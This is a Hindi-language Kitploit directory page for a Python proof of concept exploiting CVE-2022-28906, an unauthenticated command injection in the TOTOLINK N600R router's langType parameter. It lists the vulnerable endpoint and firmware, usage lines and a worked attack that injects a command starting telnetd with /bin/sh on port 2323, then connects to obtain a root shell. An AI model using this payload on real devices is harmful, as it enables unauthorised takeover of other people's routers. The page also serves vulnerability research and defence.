Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-28906-POC — पायथन प्रूफ-ऑफ-कॉन्सेप्ट TOTOLINK N600R में बिना प्रमाणीकरण के OS कमांड इंजेक्शन के लिए, जो langType पैरामीटर का शोषण करके डिवाइस पर मनमाने कमांड निष्पादित करता है। | Kitploit
उपकरण/GitHubGitHub/finnvle/cve-2022-28906-poc
IoT सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोलहार्डवेयर और IoT सुरक्षा
GitHubfinnvle/cve-2022-28906-poc

CVE-2022-28906-POC

पायथन प्रूफ-ऑफ-कॉन्सेप्ट TOTOLINK N600R में बिना प्रमाणीकरण के OS कमांड इंजेक्शन के लिए, जो langType पैरामीटर का शोषण करके डिवाइस पर मनमाने कमांड निष्पादित करता है।

रिपॉजिटरी देखें
12 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-28906 PoC

TOTOLINK N600R में बिना प्रमाणीकरण के कमांड इंजेक्शन के लिए Python प्रूफ ऑफ कॉन्सेप्ट।

Python CVSS

भेद्यता

उत्पादTOTOLINK N600R
फर्मवेयरV5.3c.7159_B20190425
प्रकारOS कमांड इंजेक्शन (CWE-78)
पैरामीटरlangType
एंडपॉइंट/cgi-bin/cstecgi.cgi
CVSS v3.19.8 क्रिटिकल

TOTOLink N600R V5.3c.7159_B20190425 में /setting/setLanguageCfg में langtype पैरामीटर के माध्यम से कमांड इंजेक्शन भेद्यता पाई गई।

सेटअप

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt

उपयोग

root@kitploit:~
# उपयोग: python3 poc.py <TARGET> <COMMAND>
# उदाहरण: python3 poc.py 192.168.68.1 "reboot"
# उदाहरण: python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"

python3 poc.py <TARGET> <COMMAND>

प्रूफ ऑफ कॉन्सेप्ट उदाहरण

PoC का उपयोग करके लक्ष्य पर पोर्ट 2323 पर /bin/sh सेवा सक्षम करने के लिए रिमोट निष्पादन करें

root@kitploit:~
python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"

सफल PoC प्रतिक्रिया

पोर्ट 2323 सक्षम होने पर परिणाम देखें

Nmap पोर्ट 2323 खुला दिखा रहा है

पोर्ट 2323 के माध्यम से telnet का उपयोग करके लक्ष्य से कनेक्ट करें

root@kitploit:~
telnet 192.168.68.1 2323

रूट शेल सत्यापन

संदर्भ

  • NVD — CVE-2022-28906
  • CVE रिकॉर्ड — CVE-2022-28906
  • CWE-78 — OS कमांड इंजेक्शन

अस्वीकरण

बिना किसी वारंटी के जैसा है वैसा प्रदान किया गया। लेखक दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।

टूल डाउनलोड करें